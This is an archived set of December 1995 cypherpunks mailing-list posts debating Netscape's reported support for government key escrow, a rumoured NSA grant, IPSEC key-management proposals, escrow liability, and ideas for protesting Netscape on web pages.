Message-ID: <199512011708.JAA27113@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> >
> >Shouldn't be too hard to hack this into Apache.

	Should my commercial release of Apache/SSL include this? ;-)
(I could make it into a configuration option, so that if the
User-Agent is Mozilla, it passes Back a Refresh: header with the
response....)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 02:06:39 +0800
To: BRUEN@mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science)
Subject: Re: nsa and netscape
In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu>
Message-ID: <199512011709.JAA27184@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	"beef up". "Yeah, Skipjack is much more secure than RC4-40..."

> 
> 
>   The following came from a government source. I thought it might be of
>   interest. 
>                        Bob
> --------------------------------------------------------------------------
> 
>      At yesterdays FNC  (Federal Networking Council) meeting it was 
>      mentioned in passing that NSA has given Netscape a grant of $5 Million 
>      (yes $5M) to beef up the security features of Netscape. More info will 
>      be forthcoming on this.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 2 Dec 1995 02:06:58 +0800
To: cypherpunks@toad.com
Subject: CPunks in the news: St. Jude
Message-ID: <199512011712.JAA29020@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Today's (1 Dec 95) LA Times has a writeup on female "hackers", and gives
several sympathetic column-inches to St. Jude Milhon, a charter Cypherpunk.
Evidently she has a new book coming out (Girls with Modems?).

	Jim Gillogly
	Sterday, 11 Foreyule S.R. 1995, 17:11




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 1 Dec 1995 23:50:25 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <m0tHeeN-0008zTC@pacifier.com>
Message-ID: <199512011529.JAA27678@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> said:

JW> jim bell wrote:

>> Here's a question: Why can't Netscape be released WITHIN THE US with
>> 128 bit keys?  Admittedly, it would probably...uh...escape within a
>> few hours, but that's no worse than what other cryptosystems
>> (best-known example, PGP) have done.

JW>   It is.  You can buy if from our home page, or from most computer
JW> stores.

	For Linux?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 1 Dec 1995 23:02:09 +0800
To: "cypherpunks@toad.com>
Subject: RE: Netscape gives in to key escrow
Message-ID: <01BABFD2.6307C180@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


JR wrote:

>With regard to all this waving about Netscape giving in to key scrow...
>
>First one question, and then some considerations. The question:
>
>- How much of Netscape stock is in the hands of Netscape? I mean in the hands

The original IPO was for 5 million shares. The vast
majority of the stock is not on the market yet. It's
owned/controlled by Clark et al, and presumably a
healthy share for the VC's (though I have no knowledge
of their participation).

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zuhn@sctc.com (david d `zoo' zuhn)
Date: Sat, 2 Dec 1995 14:59:30 +0800
To: BRUEN@mitlns.mit.edu ("Bob Bruen, MIT Lab for Nuclear Science")
Subject: Re: nsa and netscape
In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu>
Message-ID: <199512011553.JAA12735@spirit.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


//      At yesterdays FNC  (Federal Networking Council) meeting it was 
//      mentioned in passing that NSA has given Netscape a grant of $5 Million 
//      (yes $5M) to beef up the security features of Netscape. More info will 
//      be forthcoming on this.

This isn't all that surprising.  The NSA likes Fortezza, and Netscape has
announced that they will be supporting Fortezza based authentication. 
This was first made public in the SSL v3 draft circulated many months ago.

FORTEZZA support is virtually required for any sort of new network
authentication within the US DoD.  

The DoD pie is rather large, and I don't blame Netscape for trying to get
a piece of it.  One can support FORTEZZA without giving in to GAK for
non-FORTEZZA users.

-- 
david d `zoo' zuhn   ---  secure computing corporation
zuhn@sctc.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sat, 2 Dec 1995 03:16:51 +0800
To: "Bob Bruen, MIT Lab for Nuclear Science" <cypherpunks@toad.com
Subject: Re: nsa and netscape
Message-ID: <ace4efa601021004f8fe@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


Could we have a source or a confirmation of this. It is a conspiracy
theorists wet dream, so I will reserve judgement until there is more
evidence that this is true.

        -Lance

At 4:31 AM 12/1/95, Bob Bruen, MIT Lab for Nuclear Science wrote:
>  The following came from a government source. I thought it might be of
>  interest.
>                       Bob
>--------------------------------------------------------------------------
>
>     At yesterdays FNC  (Federal Networking Council) meeting it was
>     mentioned in passing that NSA has given Netscape a grant of $5 Million
>     (yes $5M) to beef up the security features of Netscape. More info will
>     be forthcoming on this.

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 2 Dec 1995 04:00:15 +0800
To: cypherpunks@toad.com
Subject: I Agree buttons, GAKzilla & liability.
In-Reply-To: <Pine.BSF.3.91.951201085245.27648C-100000@mercury.thepoint.net>
Message-ID: <Pine.3.89.9512010932.A35746-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Brian Davis wrote:

> Well that would depend on the terms of the agreement to hold the escrowed 
> keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> write the agreement so that it says, in essence, "we will try really 
> really hard not to let the keys out, but if they get out, our only 
> liability if to say 'Ooops' followed by a heartfelt apology!"

<IANAL>
This sounds like the fine print you "agree" to by opening commercial software
packages. Hasn't this been found void in a couple of places? The "OK"  or 
"I Agree" buttons I'm forced to press (but you don't *have* to download 
software, nya,nya,nya...) when downloading wares also comes to mind.
Has this been tested in a court? (Sega's reverse engineering suit from 
a while back comes to mind)

Pressing buttons is hardly the same as your notarized handwritten signature
on paper (we prefer blood, it's more permanent), or its digital equivalent.
Mere tokenism, not insurance. 
</IANAL>

About JR's concern about Netscape's shareholders, they're playing a bubble
market and they know it. I wish them all the money and luck; luck is 
something they're gonna need if this is to go on.

Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time 
netscape). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 1 Dec 1995 23:51:23 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512010549.VAA27874@blob.best.net>
Message-ID: <9512011509.AA13878@outland>
MIME-Version: 1.0
Content-Type: text/plain



> Is there any way one could set up a dirty pictures web
> page in such a fashion that it would be difficult, painful,
> and impractical to get at the pictures through that page
> with a netscape browser?

	Well, going back to the LiveScript thread, it looks as
if one could very easily write a small LiveScript prog to immediately
bounce NS users on to another page (such as the "Christian" Coalition's
manifesto on why you shouldn't be able to look at the stuff in the
first place :).  Hummm, let's see how bored I get at lunch time 
today :).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Sat, 2 Dec 1995 02:56:54 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511301616.IAA18452@infinity.c2.org>
Message-ID: <199512011629.KAA28071@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Miszewski <crypto@midex.com> said:

MM> On Thu, 30 Nov 1995, sameer wrote:

s> Jeff: If Netscape comes out in favor of GAK, will you leave?  (Wait
s> until February, at least, of course..) You don't have to answer that
s> to me, or the list, just think about it, and answer it for yourself.
s> Do you think "anyone else" there would leave, as you say below that
s> they don't want to go down history, etc...

MM> While this would go over well in the press if handled right please
MM> let everyone remember that Jeff is a real person with bills to pay
MM> and food to put on at least his own table.

	I believe that was the point: How many people at Netscape would
put principled opposition to GAK ahead of expediency?  My guess?  Not
enough.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Sat, 2 Dec 1995 14:55:17 +0800
To: jmhayes@netcom.com (Jordan Hayes)
Subject: Re: A challenge ...
In-Reply-To: <199512010735.XAA04851@netcom14.netcom.com>
Message-ID: <30bf2dac4d6f002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Jordan Hayes said:
> 
> I've been challenged to try to find a bank account; I win the challenge
> if I can wire in $100 to the hidden account.  Anyone have any good
> ideas about how to find an ABA number?

Depends on what information you have. You looking for a Bank Name/ABA #
lookup, or the other way around?

-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 03:06:05 +0800
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.BSF.3.91.951201085245.27648C-100000@mercury.thepoint.net>
Message-ID: <199512011533.KAA19471@homeport.org>
MIME-Version: 1.0
Content-Type: text


Brian Davis wrote:

| On Thu, 30 Nov 1995, Adam Shostack wrote:

| > 	One thing that stockholders do care about is liability.  Its
| > my (non lawyerly) opinion that anyone implementing GAK without a
| > government mandate to do so is opening themselves up to huge liability
| > the Clipper database of keys gets out.

| Well that would depend on the terms of the agreement to hold the escrowed 
| keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
| write the agreement so that it says, in essence, "we will try really 
| really hard not to let the keys out, but if they get out, our only 
| liability if to say 'Ooops' followed by a heartfelt apology!"

	I'm not sure thats true.  Allow me to argue by analogy.

	A car company, hearing the FBI's laments about cars being used
as getaway vehicles after bank robberies, starts a program of putting
explosives in all their cars, with radio detonators.  In an
unfortunate accident, some of the explosives go off for no reason,
injuring the owner of the car, etc, etc.  It seems to me that the car
maker would be quite liable for doing something stupid (putting
explosives in the engine block), even though they didn't cause the
explosion.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 2 Dec 1995 03:01:10 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: I Agree buttons, GAKzilla & liability.
In-Reply-To: <Pine.3.89.9512010932.A35746-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951201104429.11481A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW:

A guy from the Wall Street Journal was on the CNN biz show this morning 
explaining all the reasons why Netscape's stock value was supported only 
by religious belief.

This may have a depressing effect on the stock value, as well as the 
morale of Netscapes major stockholders.

bd


On Fri, 1 Dec 1995 s1113645@tesla.cc.uottawa.ca wrote:

> On Fri, 1 Dec 1995, Brian Davis wrote:
> 
> > Well that would depend on the terms of the agreement to hold the escrowed 
> > keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> > write the agreement so that it says, in essence, "we will try really 
> > really hard not to let the keys out, but if they get out, our only 
> > liability if to say 'Ooops' followed by a heartfelt apology!"
> 
> <IANAL>
> This sounds like the fine print you "agree" to by opening commercial software
> packages. Hasn't this been found void in a couple of places? The "OK"  or 
> "I Agree" buttons I'm forced to press (but you don't *have* to download 
> software, nya,nya,nya...) when downloading wares also comes to mind.
> Has this been tested in a court? (Sega's reverse engineering suit from 
> a while back comes to mind)
> 
> Pressing buttons is hardly the same as your notarized handwritten signature
> on paper (we prefer blood, it's more permanent), or its digital equivalent.
> Mere tokenism, not insurance. 
> </IANAL>
> 
> About JR's concern about Netscape's shareholders, they're playing a bubble
> market and they know it. I wish them all the money and luck; luck is 
> something they're gonna need if this is to go on.
> 
> Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time 
> netscape). 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 02:40:22 +0800
To: fletch@ain.bls.com (Mike Fletcher)
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <9512011509.AA13878@outland>
Message-ID: <9512011550.AA06928@all.net>
MIME-Version: 1.0
Content-Type: text


> > Is there any way one could set up a dirty pictures web
> > page in such a fashion that it would be difficult, painful,
> > and impractical to get at the pictures through that page
> > with a netscape browser?
> 
> 	Well, going back to the LiveScript thread, it looks as
> if one could very easily write a small LiveScript prog to immediately
> bounce NS users on to another page (such as the "Christian" Coalition's
> manifesto on why you shouldn't be able to look at the stuff in the
> first place :).  Hummm, let's see how bored I get at lunch time 
> today :).

How about a LiveScript bathing suit that covers up the interesting parts
of the picture and replaces them with a statement that because they are
supporting Netscape's (whatever), this part of the picture has been
blanked along with indformation on where they can get an alternative
free browser that will show the rest of the picture. 


-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Dec 1995 02:21:23 +0800
To: markson@osmosys.incog.com (Tom Markson)
Subject: Re: SKIP source release is out
In-Reply-To: <9512010919.AA29567@monster.incog.com>
Message-ID: <199512011613.LAA08608@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Markson writes:
> > Doug Hughes writes:
> [ Perry Metzger writes: ]
> > > >SKIP is a non-standard being pushed by Sun.
> > >
> > > Correct me if I'm wrong, but isn't sun trying to make it a standard
> > > (in competetion with Photuris) ?
> 
> Doug, you are correct.  SKIP is an IPSEC internet draft.  Photuris is
> an IPSEC internet draft.  Perry is incorrect in saying that SKIP is 
> a non-standard.   Both of the chairs of the IPSEC group have said SKIP 
> is part of the IPSEC working group.

Yes, and I believe that it has also been made pretty clear that you
have a snowball's chance in hell of getting SKIP to be a first class
standard.

Anything can be part of the IPSEC working group if it insists, you
know. Anyone can publish an RFC, too. 

> Phil Karn (author of Photuris) has also said this.

Other people are substantially more diplomatic than me.

> Both SKIP and Photuris are on the standards track.

No, I think that SKIP is pretty clearly headed, at best, to
elective. It isn't ever going to be a standard, period.

> > The IETF has many sorts of standards. It explicitly has a way to
> > standardize things that the IETF doesn't think are a good idea but
> > which should have the ability to interoperate if you do them.
> 
> That's true, but SKIP is not in that category.

Think what you like.

> > My opinion is that it is fairly clear that Photuris is the key
> > management system people will be using, although it is going to have
> > to evolve to work with a real network wide certificate database
> > infrastructure. SKIP isn't going to be the standard.
> 
> Again, in *your* opinion.  No determination has been made that I know of.

Actually, Ran pretty much explicitly said in Danvers that we were
headed towards Photuris and Photuris-like protocols. I know he's a bit
more diplomatic about how he says such things, but again, I think that
the situation is fairly clear, no matter what you guys choose to tell
the trade press.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Sat, 2 Dec 1995 02:51:43 +0800
To: cypherpunks@toad.com
Subject: Re: key escrow compromise
In-Reply-To: <199511302339.PAA01778@netcom5.netcom.com>
Message-ID: <199512011721.LAA28534@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> said:

	The gist of the whole thread is that voluntary key escrow is
acceptable, mandatory key escrow, which GAK apparently is, is very evil.

VZN> in other words, we agree that the government does have the
VZN> authority to link people to their "official numbers", but we have a
VZN> choice about when to use those official numbers in any private
VZN> communication, and by law businesses do not ever have to *require*
VZN> authentication in this way.  the numbers of course would be
VZN> required in communication between the individual and government.

VZN> the situation is that the government *now* requires that it knows
VZN> who we are when we communicate with it in any official
VZN> context. therefore I submit that the above system would not take
VZN> away any rights, and in fact might lead to privacy advocates being
VZN> able to use a massive government key-infrastructure but still
VZN> retain communication privacy.  in other words, you now have the
VZN> government actually supporting your cryptographic freedom by giving
VZN> you a massive "official" key distribution system you can use any
VZN> way you like.

	No, you are not required to identify yourself to the government
when communicating with it in all situations.  Certainly, there are many
situations when you are required to do so, but there are numerous
channels in which anonyminity is permitted, and sometimes even
guaranteed.  Ironically, most of these are in law enforcement/public
safety situations (anonymous tips, whistleblowing, etc).

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Fri, 1 Dec 1995 09:16:30 +0800
To: cypherpunks@toad.com
Subject: Q: Legal liability for Certification Authority
Message-ID: <pgpmoose.199512011139.6629@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


In the last few weeks, mostly under the subject of
creating a Cypherpunks Certification Authority,
someone mentioned legal liability of a CA if a
certified identity was misused.

I am looking for material to pass on to a REAL,
PAID net-savvy lawyer relating to this question.
In return for the money we pay him, he will
return an opinion on just what liability exposure
would be for, say, a large technical users group
who got into the CA business for PGP keys. And/or
what disclaimers or indemnities would be needed.

I would be happy to make his legal opinion
available to the list. IANAL, so I don't know just
what precedents, decisions, regulations, and so on
might be relevent. More information is always a
good thing.

Please:

1. reply to me by mail, not the list, unless there
is more general relevence to Cypherpunks. I'll
summarise.

2. Speculation is not useful.

thanks,
Greg.

-- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Fri, 1 Dec 1995 17:52:33 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951201114501.20a03b98@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


With regard to all this waving about Netscape giving in to key scrow...

First one question, and then some considerations. The question:

- How much of Netscape stock is in the hands of Netscape? I mean in the hands
of the people that work in/for the Company? And how much is in outsiders whose
only interest is earning as much as possible?

That is, my friends, the key point. When Netscape began selling shares, and
before and after that, they were (and still are) widely criticized in this
list.

I assume most cypherpunks didn't buy. I'd also bet many oportunists, did. And
I'd bet many activists thougth this was their chance to get a hold on the
development of Internet...

So, now we have that most of Netscape is owned by people that either don't
care but for money, or fundamental activists. And then, those people have to
take decisions.

And then they are faced with confronting their government who tells them what
to do if they don't want to have problems. And who probably offers some hidden
compensations to get their support (maybe tax reliefs?). And who menaces with
countermeasures if they don't agree.

Oh, they are also faced with lots of fundamentalistic priests who tell them
they'll go to hell if they don't give in. Or engage in a crusade against the
"evil" net.

What did you expect Netscape to do? The guys with the money and the control
won't face all the small shareholders and tell them they are going to be
"evil" against the gov. and the priests and the religious organizations,
and that they will face gov. restrictions, give up political and economic
advantages, etc.. to satisfy a bunch of cypher
punks that are continuously
complaining publicly against the company and don't even buy shares.

That's what I think that has happened. And I may be wrong. But there's a
lesson to learn: there is a lot of anti-crypto guys out there. Unknowledgeable
people, gul
lible persons, and fanatics who won't doubt doing anything to
get a total control of things. Either we try to educate them, make them
more knowledgeable and less gullible, or we fight back with our own companies
or buying more shares than them. Or both.

Sitting back and complaining won't help crypto, freedom or anything for that
matter at all.

That said, before blaming more on Netscape and asking a starting company
whose major aset is still shareholders instead of sales, we should think
better about the correct strategy.

Now, who's gonna offer some constructive ideas for a change?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 03:16:47 +0800
To: semper.fi@solutions.apple.com
Subject: GAK, Netscape, CyberDog, and you.
Message-ID: <v02120d0dace4adfb1c6c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Hi Semper Fi-ers!

I've been lurking on this list for a long time, and I haven't said much
here primarily because I'm not a developer. I mean, I've hired developers,
and sold the software I've had them build for me. Not very well, I might
add, which is why I try do something else (talk and write) for a living
now. Frankly, I couldn't code my way out of a paper bag, which, of course,
is why I've not said much here. :-).

Anyway, something has come up which I think makes the world very
interesting, and I think you should know about it.

Netscape has come out in favor of what the government calls "key escrow",
but which most "cypher"-punks (and I seem to have become one over the last
year and a half) call GAK, for Government Access to Keys.

Here's the URL: http://www.cnet.com/Central/News/govt.html . This is a news
report of a speech that Jim Clark gave at a trade show in Boston this week.

Normally, as serious as this is in the rest of the world, that wouldn't
really rate a mention here, except for the fact that this presents a very
interesting set of opportunities for the *independent* Mac developer
community in the form of CyberDog, Apple's set of OpenDoc parts for the
internet. I'll get to that in a moment, but first, let me give you some
background on the problem.


Netscape's Jim Clark has quite a tightrope act going. He has a stock price
which gives Netscape a P/E ratio of something like 7,000 (the S&P average
right now is about 14), which means he really ought to get some revenue in
the door, or his investors are going to have his hide. The next thing is,
the government is a *really* big customer, and *they* want GAK, in case you
haven't noticed. ;-). Couple this with the fact that Netscape is pretty
much replicable by concentrated developer effort because its underlying
technology is an open standard, *and* the fact that any significant attempt
by them to create any real proprietary standards on the internet is
practically impossible in the long run, unless they get a whole lot of very
big customers in a hurry.

Now, it looks like that's what happened already, because a lot of very
large companies have signed on to using Netscape servers, but you can also
see how really weak Netscape's position is when Uncle Sam knocks on their
door and asks for a key escrow "bug" in every "secure" Netscape web
session.

This isn't the first time that Netscape has had problems with financial
cryptography and the law. Netscape made the papers recently because the
government-mandated SSL key-size in their export version was too small. (We
won't talk about the cognitive dissonance between the words "export" and
"internet" just yet...)  The "export" version of  Netscape Navigator got
cracked by a French grad student in a university computer lab, who broke it
just by running a bunch of background processes on his Sun workstations for
a couple days over a weekend. The ITARs, the arms export laws covering this
(cryptography is legally a munition, more cognitive dissonance), are a now
problem for everybody who wants to do business securely and safely on the
internet.

More to the point, since digital bearer certificate technology, the most
economical method for doing business on the net, is entirely based on
digital signatures, which in turn are entirely based on very strong public
key cryptography, all business on the internet will eventually require very
strong cryptography. In other words, if you don't have unbreakable key
sizes, you can't issue digital certificates to pay for things with. It
would be like having paper money which is easy to forge.

Lately, I like to say that "Digital Commerce *is* Financial Cryptography",
and it's true. First Virtual has the only truly "out of band" internet
transaction settlement mechanism, it's very well-designed, and very robust,
but you have to remember that they did it *because* of the ITARs, and the
complications for financial cryptography those regulations cause, no matter
how much First Virtual itself likes to "dis" financial cryptography as a
concept. Unfortunately, the transaction costs on such out-of-band methods
are always going to be higher because of the inefficiencies of not
instantly settling transactions, like you can with something like digital
cash. When you buy something in the store for cash, you initiate, settle
and clear the trade all at once, right there at the cash register, without
an audit trail to maintain. Frankly, *any* credit card trade is really an
"out-of-band" method, because it has to go off of the net to clear and
settle, with audit trails, and the overhead of their offsetting
book-entries.

Fortunately, as governments start to figure this out, they will have to
stand back and let the economic train go by, so to speak.


So, having said all that, let's talk about OpenDoc and CyberDog.

I hear that with CyberDog, building a secure Netscape-compatible browser in
OpenDoc is now pretty simple. That adding economically useful -- and
interchangable -- functionality like strong encryption, digital cash
protocols and most of the tools of digital commerce is also pretty
straightforward. That is, even though they have to be developed separately,
because Apple justifiably doesn't want to have the ITARs limiting its
export market for both OpenDoc and CyberDog. Again that cognitive
dissonance between "export" and "internet".

In addition to building utterly secure browser-server links, I see some
interesting OpenDoc digital commerce applications coming out of a
Netscape-compatible browser. My favorite "flash" on this was imagining the
ability to drag Digicash ecash dollar bill icons out of a wallet and
dropping them on a cash-register icon in a web page to pay for a
transaction. That's certainly doable with OpenDoc and CyberDog.

In addition, the IETF has just promulgated a secure link-level encryption
standard called IPSEC, which allows for encrypted links between any two
machines on the net, with any cryptographic method you want. That looks
like a great Open Transport Streams Module project to me. And the wierd
thing is, once IPSEC is out there, GAK in Netscape becomes moot, anyway.
Netscape can only shoot itself in the foot here, and it looks like they
already have, with a premature announcement of GAK.


One final thing about Netscape. It's not their fault. There is no evil
man-behind-the curtain in all of this. The government's doing what it
thinks necessary for the preservation of order, and thinks it needs GAK to
do that. Netscape is doing the best it can for its (newly rich)
stockholders, and thinks it needs to comply with Uncle Sam, which it
probably in fact has to do, or burst it's stock market price sooner, rather
than later.

Also, there is no reason why Netscape can't make a Navigator OpenDoc part,
and I expect that they are planning to. I bet that Apple would really like
that, and as a matter of fact, is probably courting Netscape to do exactly
that.

But I also know that by using OpenDoc and CyberDog, that the user can
create a very easy to use, flexible, extensible, and *powerful* internet
environment. Being there first with a Netscape-compatible browser,
especially one that doesn't have GAK built into it, will be worth a whole
lot in the marketplace for any enterprizing independent OpenDoc parts
developer.


I'm going to be giving a talk on Wednesday at noon at Apple's Town Hall, (4
Infinite Loop) in Cupertino about what I'm calling "geodesic" markets, that
is,  financial cryptography on the internet.  The URL for a web page with
all the details is

http://thumper.vmeng.com/pub/rah/talk.html .

In addition, if you want more stuff on financial cryptography, you might
want to try my e$ home page, which is in my .sig, below.

Finally, I've asked an *actual* financial cryptographer, Eric Hughes, who
many of you may know from the cypherpunks mailgroup, and from the Clipper
fight, to show up at the Cupertino talk and bail me out on the real hard
questions.


Well, that's about it. Oh. The talk is titled "Financial Cryptography for
Dogs". I think you can see why, in light of the events of the last week,
it's quite appropriate.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Sat, 2 Dec 1995 02:27:16 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <m0tLZ6C-00035KC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:57 PM 11/30/95 -0500, JHupp@Gensys.Com wrote:

>	And at that point, you shut down the remailer and log each and every 
>bounce.
>
>	Now, they could get an order forcing you to run a remailer ~ but that 
>would open up a whole new can of worms i.e. can you be forced, under 
>court order, to commit a crime?
  
That's not how they do it.  They will tell you that unless you cooperate,
you will
be charged for the "crime" you have been committing.  Where do you think
confidential informants come from?  They're just people who have been caught
or set up by the cops, who are trying to save their own ass.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 2 Dec 1995 05:09:36 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512012008.MAA01222@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


IMHO, all the people who are planning to alter web pages to deal with the
Netscape/GAK issue should consider the following points:

(1) A recent large web site reported that 95% of their accesses were from
Netscape browsers.

(2) You want to inform the public and put pressure on Netscape, not piss
off the people using netscape browsers.  A quick, one page, detour would
seem appropriate, but not denial of access or other hostile acts.

(3) You should save some room for esclation.  (e.g. denial of access etc.) 
Don't hit them with everything in the first round.

(4) Any list of alternative browsers has to include at least one viable
browser for each of the major platforms.  (At least, Windows, Mac, SunOS,
Solaris, HP, AIX, BSD, Linux.  Probably a lot more.)

Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 2 Dec 1995 05:08:35 +0800
To: cypherpunks@toad.com
Subject: Re: Media Advisory: GAK on Dec 5
Message-ID: <199512012008.MAA01226@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 17:26 12/1/95 +0100, Anonymous wrote:
>Nov. 6, 1995
>Contact:  Anne Enright Shepherd
>(301) 975-4858
>anne.shepherd@nist.gov
>
>
>                         MEDIA ADVISORY
>          
